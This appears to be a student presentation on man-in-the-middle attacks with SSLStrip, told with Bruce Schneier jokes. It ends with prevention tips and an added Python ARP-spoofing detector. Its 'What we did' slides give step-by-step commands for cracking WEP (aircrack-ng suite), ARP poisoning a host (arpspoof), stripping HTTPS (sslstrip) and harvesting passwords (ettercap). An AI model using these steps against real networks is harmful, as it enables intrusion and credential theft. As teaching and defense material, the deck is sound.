7/31/2019 mitm - Man in the Middle
Man-in-the-Middle Attack With SSL Strip
Kyle Benson, Trevor Kiernan, Glen Saunders
Bruce Schneier's earliest childhood memory is encrypted.
-
What is SSL?
Secure Socket Layer
Predecessor to Transport Layer Security (TLS)
Establishes a secure connection between two computers
Important for banking sites and others
Authenticates: the server is actually who it says it is
Bruce Schneier's p is irrational, and his q is imaginary.
-
How Does it Work?
Runs on port 443 (not HTTP's port 80)
Client sends server hello and certificate
Server sends a signed certificate
Verified by Certificate Authority such as Verisign
Certificate used to encrypt data
-
What is MITM?
Alice is trying to talk to Bob
Eve jumps in the middle
ARP spoofing (wireless)
Physical insertion (wired)
Eve tells Bob she is Alice and Alice that she is Bob
Bruce Schneier killed Eve and Mallory with a birthday attack!
-
What is MITM?
When Alice sends something to Eve (thinking she's Bob), Eve can read it
Eve forwards this information to Bob
Bob replies to Eve (thinking she's Alice)
Eve can read e-mail and intercept supposedly secure data (user names and passwords!)
Bruce Schneier is always the Man in the Middle.
-
What is ARP Spoofing?
ARP = Address Resolution Protocol
Alice sends ARP request (who is 192.168.1.1?)
Eve replies before router can so that Alice thinks she is the router
Now Alice's ARP cache is poisoned; thinks Eve is the router
Eve forwards packets to her router
-
What is SSLStrip?
Performs aforementioned MITM attack
Forwards all regular HTTP traffic
Changes Alice's HTTP request to HTTPS
Forwards this request via HTTPS to Bob
Explicit HTTPS request is sent a fake certificate signed by Eve
Replaces images with secure lock
Bruce Schneier can draw a perfect circle with an Etch-a-Sketch.
-
Capturing Information
Ettercap pulls passwords and user names for many different programs and protocols
Displays Bob's IP and URL
SSLStrip creates a log file
Bruce Schneier can break elliptic curve cryptography by bending it to a circle.
-
What we did
1. Scan for networks
2. Crack a network
3. Connect to the cracked network
4. Learn about a host on the network
5. MITM on that Host
6. Strip his/her SSL
7. Scan for usernames and passwords
8. Exit gracefully
-
Scanning for Networks
airodump-ng wlan1
Bruce Schneier can divide by zero.
-
Crack it
airodump-ng -c 11 -w target_router wlan1 &
aireplay-ng -1 0 -e target_router -h [faked mac address] wlan1
After successful connection, aireplay-ng -3 -e target_router -h [faked mac] wlan1
Let the data rate climb and aircrack-ng target_router-01.cap
Within 5 minutes you should have the WEP key. :-D
-
Connect
Connect to the router with the card you just attacked with.
It should still have the same faked MAC address it was set to in the previous arp-replay attack
So now it's time for some recon
The tattoos on Bruce Schneier's fists say "Alice" and "Bob". You don't want to make him exchange keys over your face.
-
RECON
nmap -sP 192.168.1.0/28
This keeps the packet count lower and limits it to pinging
Find a host
We liked 192.168.1.2
Ran an OS fingerprint on it and checked which versions open ports were using
This generates a lot of traffic
This host looked good, and responded to our probes, so let's MITM.
Bruce Schneier counts in binary. With his fists.
-
RECON homing in
Compilers don't warn Bruce Schneier, Bruce Schneier warns compilers.
-
MITM
arpspoof -i wlan0 -t [their ip] [router ip]
arpspoof -i wlan0 -t 192.168.1.2 192.168.1.1
Bruce Schneier is always the Man in the Middle.
-
SSL strip
sslstrip -a -k -f
-a : log all ssl traffic
-k : kill current sessions
-f : insert a lock icon in their connections
Bruce Schneier's work isn't peer reviewed. He has no peers.
-
Passwords from the stream
ettercap -T -q -i wlan0
-T : text only
-q : do not display packet contents
-i : interface to use
This will log traffic over our connection and filter the target's passwords, causing them to show in our window.
We can pipe this to a file as well.
The set of Bruce Schneier's weaknesses is a mathematical constant. It is represented by the symbol .
-
How to Prevent?
Secure your damn network! (WEP is NOT secure!)
Wireshark
ARP replies appearing very frequently
Invalid certificate error
Nmap scans
Don't accept certificates that aren't verified
Static ARP tables
If Bruce Schneier wants your plaintext, he'll just squeeze it out of the ciphertext using his bare hands.
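Two of the signs listed above, ARP replies appearing very frequently and a mismatch against a static ARP table, are the detection counterpart of the cache poisoning on the "What is ARP Spoofing?" slide. The detector below is an added example, not part of the original slides: it applies both checks to a constructed list of ARP replies. The record format, function name, thresholds and MAC addresses are assumptions made for illustration.

```python
from collections import defaultdict, deque

# Constructed sample, one ARP reply per line: "seconds sender_ip sender_mac".
SAMPLE = """\
0.0 192.168.1.1 00:11:22:33:44:55
30.0 192.168.1.2 aa:aa:aa:aa:aa:02
60.0 192.168.1.1 00:11:22:33:44:55
61.0 192.168.1.1 de:ad:be:ef:00:01
63.0 192.168.1.1 de:ad:be:ef:00:01
65.0 192.168.1.1 de:ad:be:ef:00:01
67.0 192.168.1.1 de:ad:be:ef:00:01
"""


def detect_arp_spoof(lines, static=None, window=10.0, max_replies=3):
    """Return alerts as (time, kind, ip, mac) tuples.

    static      -- known-good ip -> mac pins (the static ARP table); without a
                   pin, the first MAC seen for an IP is trusted
    window      -- seconds over which replies for one IP are counted
    max_replies -- replies per window tolerated before a flood alert
    """
    bindings = {ip: mac.lower() for ip, mac in (static or {}).items()}
    recent = defaultdict(deque)  # ip -> timestamps of replies inside the window
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ts, ip, mac = line.split()
        ts, mac = float(ts), mac.lower()
        # Check 1: the reply contradicts the pinned or first-seen binding.
        if mac != bindings.setdefault(ip, mac):
            alerts.append((ts, "mac-changed", ip, mac))
        # Check 2: replies for this IP arrive more often than normal traffic would.
        seen = recent[ip]
        seen.append(ts)
        while ts - seen[0] > window:
            seen.popleft()
        if len(seen) > max_replies:
            alerts.append((ts, "reply-flood", ip, mac))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE.splitlines()):
        print(alert)
```

Trusting the first MAC seen fails if the spoofed reply arrives first, which is the case the static table covers.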